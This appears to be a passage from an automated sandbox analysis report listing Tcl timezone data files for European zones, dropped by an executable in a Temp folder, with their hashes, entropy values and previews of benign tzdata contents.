                                                                                                                                                                                                                                                    SHA1:78C5788ED4184A62E0E2986CC0F39EED3801AD76
                                                                                                                                                                                                                                                    SHA-256:D2D091740C425C72C46ADDC23799FC431B699B80D244E4BCD7F42E31C1238EEB
                                                                                                                                                                                                                                                    SHA-512:6DF08142EEBC7AF8A575DD7510B83DBD0E15DDA13801777684355937338CDA3D09E37527912F4EBBCC1B8758E3D65185E6006EB5C1349D1DC3AE7B6131105691
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Copenhagen) {. {-9223372036854775808 3020 0 LMT}. {-2524524620 3020 0 CMT}. {-2398294220 3600 0 CET}. {-1692496800 7200 1 CEST}. {-1680490800 3600 0 CET}. {-935110800 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 0 CEST}. {-769388400 3600 0 CET}. {-747010800 7200 1 CEST}. {-736383600 3600 0 CET}. {-715215600 7200 1 CEST}. {-706748400 3600 0 CET}. {-683161200 7200 1 CEST}. {-675298800 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Dublin

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9476
                                                                                                                                                                                                                                                    Entropy (8bit):3.729722634283483
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:fIfr5ZO/H8XKKRjuBHI2RLQbTaO5drSf72kVHe:fItZO/Hk5RSBHIB5tSf72kVHe
                                                                                                                                                                                                                                                    MD5:49EA614B5BCB8602EF8D9F365FBBE43D
                                                                                                                                                                                                                                                    SHA1:CF477D1759F428EA4C8A5DF89C5D3E0639422CD6
                                                                                                                                                                                                                                                    SHA-256:F686B3AEA13F71ABB8C864B2574441FF8B6F313D6F88FC502C93B89454CF542F
                                                                                                                                                                                                                                                    SHA-512:B9712380CA101A8FA768D06FA7DFA059DA2886E5BAD8806723CE44ECC06990BE65364498C8A37001FDD67608D2AF668FD1A37C5EDD8D4EA3AB63E338F927ADC5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Dublin) {. {-9223372036854775808 -1500 0 LMT}. {-2821649700 -1521 0 DMT}. {-1691962479 2079 1 IST}. {-1680471279 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1517011200 0 0 IST}. {-1507500000 3600 1 IST}. {-1490565600 0 0 IST}. {-1473631200 3600 1 IST}. {-1460930400 0 0 IST}. {-1442786400 3600 1 IST}. {-1428876000 0 0 IST}. {-1410732000 3600 1 IST}. {-1396216800 0 0 IST}. {-1379282400 3600 1 IST}. {-1364767200 0 0 IST}. {-1348437600 3600 1 IST}. {-1333317600 0 0 IST}. {-1315778400 3600 1 IST}. {-1301263200 0 0 IST}. {-1284328800 3600 1 IST}. {-1269813600 0 0 IST}. {-1253484000 3600 1 IST}. {-1238364000 0 0 IST}. {-

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Gibraltar

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9181
                                                                                                                                                                                                                                                    Entropy (8bit):3.7982744899840535
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:i2elBN44y3UKdDDMjEZtcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIV0:i44y1xZGRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:F8AEFE8F561ED7E1DC81117676F7D0E0
                                                                                                                                                                                                                                                    SHA1:1148176C2766B205B5D459A620D736B1D28283AA
                                                                                                                                                                                                                                                    SHA-256:FB771A01326E1756C4026365BEE44A6B0FEF3876BF5463EFAB7CF4B97BF87CFC
                                                                                                                                                                                                                                                    SHA-512:7C06CB215B920911E0DC9D24F0DD6E24DEC3D75FB2D0F175A9B4329304C9761FFFEE329DD797FF4343B41119397D7772D1D3DFC8F90C1DE205380DE463F42854
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Gibraltar) {. {-9223372036854775808 -1284 0 LMT}. {-2821649916 0 0 GMT}. {-1691964000 3600 1 BST}. {-1680472800 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1507500000 3600 1 BST}. {-1490565600 0 0 GMT}. {-1473631200 3600 1 BST}. {-1460930400 0 0 GMT}. {-1442786400 3600 1 BST}. {-1428876000 0 0 GMT}. {-1410732000 3600 1 BST}. {-1396216800 0 0 GMT}. {-1379282400 3600 1 BST}. {-1364767200 0 0 GMT}. {-1348437600 3600 1 BST}. {-1333317600 0 0 GMT}. {-1315778400 3600 1 BST}. {-1301263200 0 0 GMT}. {-1284328800 3600 1 BST}. {-1269813600 0 0 GMT}. {-1253484000 3600 1 BST}. {-1238364000 0 0 GMT}. {-1221429600 3600 1 BST}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Guernsey

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                                                    Entropy (8bit):4.830450830776494
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQakQAL/yQavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUyYL5
                                                                                                                                                                                                                                                    MD5:DC2B3CAC4AF70A61D0F4C53288CC8D11
                                                                                                                                                                                                                                                    SHA1:A423E06F88FDEED1960AF3C46A67F1CB9F293CAF
                                                                                                                                                                                                                                                    SHA-256:9CB6E6FEC9461F94897F0310BFC3682A1134E284A56C729E7F4BCE726C2E2380
                                                                                                                                                                                                                                                    SHA-512:8B455DA1D1A7AA1259E6E5A5CF90E62BA8073F769DCB8EB82503F2DFB70AA4539A688DC798880339A2722AA1871E8C8F16D8827064A2D7D8F2F232880359C78D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Guernsey) $TZData(:Europe/London).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Helsinki

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7120
                                                                                                                                                                                                                                                    Entropy (8bit):3.635790220811118
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:wQbXHk+PVqVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEZ9A:w6XPzh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:E7A6AA8962067EF71174CD5AE79A8624
                                                                                                                                                                                                                                                    SHA1:1250689DF0DFCCDD4B6B21C7867C4AA515D19ECD
                                                                                                                                                                                                                                                    SHA-256:5FDBE427BC604FAC03316FD08138F140841C8CF2537CDF4B4BB20F2A9DFC4ECB
                                                                                                                                                                                                                                                    SHA-512:5C590164499C4649D555F30054ECB5CF627CCCA8A9F94842328E90DD40477CADB1042D07EA4C368ABB7094D7A59A8C2EE7619E5B3458A0FAC066979B14AF44A6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Helsinki) {. {-9223372036854775808 5989 0 LMT}. {-2890258789 5989 0 HMT}. {-1535938789 7200 0 EET}. {-875671200 10800 1 EEST}. {-859773600 7200 0 EET}. {354672000 10800 1 EEST}. {370396800 7200 0 EET}. {386121600 10800 1 EEST}. {401846400 7200 0 EET}. {410220000 7200 0 EET}. {417574800 10800 1 EEST}. {433299600 7200 0 EET}. {449024400 10800 1 EEST}. {465354000 7200 0 EET}. {481078800 10800 1 EEST}. {496803600 7200 0 EET}. {512528400 10800 1 EEST}. {528253200 7200 0 EET}. {543978000 10800 1 EEST}. {559702800 7200 0 EET}. {575427600 10800 1 EEST}. {591152400 7200 0 EET}. {606877200 10800 1 EEST}. {622602000 7200 0 EET}. {638326800 10800 1 EEST}. {654656400 7200 0 EET}. {670381200 10800 1 EEST}. {686106000 7200 0 EET}. {701830800 10800 1 EEST}. {717555600 7200 0 EET}. {733280400 10800 1 EEST}. {749005200 7200 0 EET}. {764730000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Isle_of_Man

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                                                    Entropy (8bit):4.866592240835745
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQaqpfioxp8QavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUycqO
                                                                                                                                                                                                                                                    MD5:9E18F66C32ADDDBCEDFE8A8B2135A0AC
                                                                                                                                                                                                                                                    SHA1:9D2DC5BE334B0C6AEA15A98624321D56F57C3CB1
                                                                                                                                                                                                                                                    SHA-256:6A03679D9748F4624078376D1FD05428ACD31E7CABBD31F4E38EBCCCF621C268
                                                                                                                                                                                                                                                    SHA-512:014BAD4EF0209026424BC68CBF3F5D2B22B325D61A4476F1E4F020E1EF9CD4B365213E01C7EC6D9D40FA422FE8FE0FADB1E4CBB7D46905499691A642D813A379
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Isle_of_Man) $TZData(:Europe/London).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Istanbul

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8793
                                                                                                                                                                                                                                                    Entropy (8bit):3.6452802192723297
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:kICNapz9QnPPWDePrDaQrclxXl9k1dgsh6YlnFUM2kNU4tztagAwkY5V778e27zE:kuQnPoOuX1iCeh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:F2BB6DCD69A30ABFB402A5C19063CB97
                                                                                                                                                                                                                                                    SHA1:9792B9C6276937E8BD056E4E43B02AF3866404A8
                                                                                                                                                                                                                                                    SHA-256:DF3FCA43B5920FD705AF3084FC1ACEBF6ED18D2528F45E3B1BBB0754DE03FED5
                                                                                                                                                                                                                                                    SHA-512:3751D5C4A8372B4F154DFE898C1DB87A4805D24D8A3241DBF50A6238E1C6A58A0556458499D59DBA86FCF03EA528AE572A40EED4AFF2B3FEAE561594467E4BB9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Istanbul) {. {-9223372036854775808 6952 0 LMT}. {-2840147752 7016 0 IMT}. {-1869875816 7200 0 EET}. {-1693706400 10800 1 EEST}. {-1680490800 7200 0 EET}. {-1570413600 10800 1 EEST}. {-1552186800 7200 0 EET}. {-1538359200 10800 1 EEST}. {-1522551600 7200 0 EET}. {-1507514400 10800 1 EEST}. {-1490583600 7200 0 EET}. {-1440208800 10800 1 EEST}. {-1428030000 7200 0 EET}. {-1409709600 10800 1 EEST}. {-1396494000 7200 0 EET}. {-931140000 10800 1 EEST}. {-922762800 7200 0 EET}. {-917834400 10800 1 EEST}. {-892436400 7200 0 EET}. {-875844000 10800 1 EEST}. {-857358000 7200 0 EET}. {-781063200 10800 1 EEST}. {-764737200 7200 0 EET}. {-744343200 10800 1 EEST}. {-733806000 7200 0 EET}. {-716436000 10800 1 EEST}. {-701924400 7200 0 EET}. {-684986400 10800 1 EEST}. {-670474800 7200 0 EET}. {-654141600 10800 1 EEST}. {-639025200 7200 0 EET}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Jersey

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.831245786685746
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQap6cEBx/yQavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUyzO5
                                                                                                                                                                                                                                                    MD5:F43ABA235B8B98F5C64181ABD1CEEC3A
                                                                                                                                                                                                                                                    SHA1:A4A7D71ED148FBE53C2DF7497A89715EB24E84B7
                                                                                                                                                                                                                                                    SHA-256:8E97798BE473F535816D6D9307B85102C03CC860D3690FE59E0B7EEF94D62D54
                                                                                                                                                                                                                                                    SHA-512:B0E0FC97F08CB656E228353594FC907FC94A998859BB22648BF78043063932D0FC7282D31F63FCB79216218695B5DCDF298C37F0CB206160798CF3CA2C7598E1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Jersey) $TZData(:Europe/London).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Kaliningrad

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2397
                                                                                                                                                                                                                                                    Entropy (8bit):3.872391899125256
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:cGv6a621nwJ2JoJrprXnW0UiVV0Qv3LEevBFoBGrjI9q1F008bBJd5:cGvt67yurprXWTeV/DYtXT
                                                                                                                                                                                                                                                    MD5:E5131CD9A15537EEB90E2AF3A6F1D4C1
                                                                                                                                                                                                                                                    SHA1:106916678943CBF0E30AC2B77405C20357BF5C0B
                                                                                                                                                                                                                                                    SHA-256:8CF43F50386950483E80DDCB931B682E3E742C5D4E20FD5C55BF09CFD3F3EBE8
                                                                                                                                                                                                                                                    SHA-512:0007C0F18682A34C5C54036F7F5E428AEBBAE3CACE268A54901E39101F0FC3A40628B399210C114D43AC0D107FFB97BD8D6D2B6DBF697ADCF3E31A4A39ADF438
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Kaliningrad) {. {-9223372036854775808 4920 0 LMT}. {-2422056120 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 7200 0 CET}. {-778730400 10800 1 CEST}. {-762663600 7200 0 CET}. {-757389600 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Kiev

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7202
                                                                                                                                                                                                                                                    Entropy (8bit):3.6738341956502953
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:j/fE2JyurpyVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEZ2:j/fN8GHh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:4E693AC10DD3FC66700A878B94D3701D
                                                                                                                                                                                                                                                    SHA1:692200B78A3EA482577D13BE5588FEB0BF94DF01
                                                                                                                                                                                                                                                    SHA-256:3AAC94E73BB4C803BBB4DE14826DAA0AC82BAE5C0841FD7C58B62A5C155C064D
                                                                                                                                                                                                                                                    SHA-512:9B68D418B98DDF855C257890376AEC300FC6024E08C85AF5CFFE70BE9AC39D75293C35D841DB8A7BE5574FD185D736F5CB72205531736A202D25305744A2DD15
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Kiev) {. {-9223372036854775808 7324 0 LMT}. {-2840148124 7324 0 KMT}. {-1441159324 7200 0 EET}. {-1247536800 10800 0 MSK}. {-892522800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-825382800 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {638319600 14400 1 MSD}. {646786800 10800 1 EEST}. {686102400 7200 0 EET}. {701820000 10800 1 EEST}. {717541200 7200 0 EET}. {733269600 1

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Lisbon

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9471
                                                                                                                                                                                                                                                    Entropy (8bit):3.7395405211894532
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:1MgVSz+IZHX68PlXIFj544IrvfMsbxZTH7qwQ:1MYSz+IZHX68PlYFUM8xZTH7qwQ
                                                                                                                                                                                                                                                    MD5:A38B1394DF3266B55823F763FA63A03C
                                                                                                                                                                                                                                                    SHA1:A8BD0F7613A59A0104ABA8958188D435CE71D273
                                                                                                                                                                                                                                                    SHA-256:354D9C1FCFBC0EBF19F563A2685CE1CBDCB5061089BBD301211477358CEEACF3
                                                                                                                                                                                                                                                    SHA-512:240BE4F7B1FB774D5557190ACC44DF702FC6AF772970F2B07626FB96A3B3FBC945C1BCF079EFDD7DB8A91BD8E30F11682B2A835F42FCB0782C7EC15989E78111
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Lisbon) {. {-9223372036854775808 -2205 0 LMT}. {-2713908195 -2205 0 LMT}. {-1830381795 0 0 WET}. {-1689555600 3600 1 WEST}. {-1677801600 0 0 WET}. {-1667437200 3600 1 WEST}. {-1647738000 0 0 WET}. {-1635814800 3600 1 WEST}. {-1616202000 0 0 WET}. {-1604365200 3600 1 WEST}. {-1584666000 0 0 WET}. {-1572742800 3600 1 WEST}. {-1553043600 0 0 WET}. {-1541206800 3600 1 WEST}. {-1521507600 0 0 WET}. {-1442451600 3600 1 WEST}. {-1426813200 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1221440400 3600 1 WEST}. {-1206925200 0 0 WET}. {-1191200400 3600 1 WEST}. {-1175475600 0 0 WET}. {-1127696400 3600 1 WEST}. {-1111971600 0 0 WET}. {-1096851600 3600 1 WEST}. {-1080522000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Ljubljana

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.901869793666386
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQavPSJ5QahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vqm
                                                                                                                                                                                                                                                    MD5:5F2AEC41DECD9E26955876080C56B247
                                                                                                                                                                                                                                                    SHA1:4FDEC0926933AE5651DE095C519A2C4F9E567691
                                                                                                                                                                                                                                                    SHA-256:88146DA16536CCF587907511FB0EDF40E392E6F6A6EFAB38260D3345CF2832E1
                                                                                                                                                                                                                                                    SHA-512:B71B6C21071DED75B9B36D49EB5A779C5F74817FF070F70FEAB9E3E719E5F1937867547852052AA7BBAE8B842493FBC7DFAFD3AC47B70D36893541419DDB2D74
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Ljubljana) $TZData(:Europe/Belgrade).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\London

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9839
                                                                                                                                                                                                                                                    Entropy (8bit):3.737361476589814
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:Gj4y1xZfvm8nKrhFs3XRnRaQqTLJaMt/VZ1R6Y+:GjPxZfvmgEhS3XRmau/VZ1R6Y+
                                                                                                                                                                                                                                                    MD5:2A53A87C26A5D2AF62ECAAD8CECBF0D7
                                                                                                                                                                                                                                                    SHA1:025D31C1D32F1100C1B00858929FD29B4E66E8F6
                                                                                                                                                                                                                                                    SHA-256:2A69A7C9A2EE3057EBDB2615DBE5CB08F5D334210449DC3E42EA88564C29583A
                                                                                                                                                                                                                                                    SHA-512:81EFA13E4AB30A9363E80EC1F464CC51F8DF3C492771494F3624844E074BA9B84FE50EF6C32F9467E6DAB41BD5159B492B752D0C97F3CB2F4B698C04E68C0255
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/London) {. {-9223372036854775808 -75 0 LMT}. {-3852662325 0 0 GMT}. {-1691964000 3600 1 BST}. {-1680472800 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1507500000 3600 1 BST}. {-1490565600 0 0 GMT}. {-1473631200 3600 1 BST}. {-1460930400 0 0 GMT}. {-1442786400 3600 1 BST}. {-1428876000 0 0 GMT}. {-1410732000 3600 1 BST}. {-1396216800 0 0 GMT}. {-1379282400 3600 1 BST}. {-1364767200 0 0 GMT}. {-1348437600 3600 1 BST}. {-1333317600 0 0 GMT}. {-1315778400 3600 1 BST}. {-1301263200 0 0 GMT}. {-1284328800 3600 1 BST}. {-1269813600 0 0 GMT}. {-1253484000 3600 1 BST}. {-1238364000 0 0 GMT}. {-1221429600 3600 1 BST}. {-120

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Luxembourg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8826
                                                                                                                                                                                                                                                    Entropy (8bit):3.7634145613638657
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:TYt4c9+dcVhv9HMLftvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAr:0w2h1QSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:804A17ED0B32B9751C38110D28EB418B
                                                                                                                                                                                                                                                    SHA1:24235897E163D33970451C48C4260F6C10C56ADD
                                                                                                                                                                                                                                                    SHA-256:00E8152B3E5CD216E4FD8A992250C46E600E2AD773EEDDD87DAD31012BE55693
                                                                                                                                                                                                                                                    SHA-512:53AFDDE8D516CED5C6CF0A906DBF72AF09A62278D1FC4D5C1562BBCE853D322457A6346C3DE8F112FCF665102E19A2E677972E941D0C80D0AB7C8DD0B694628E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
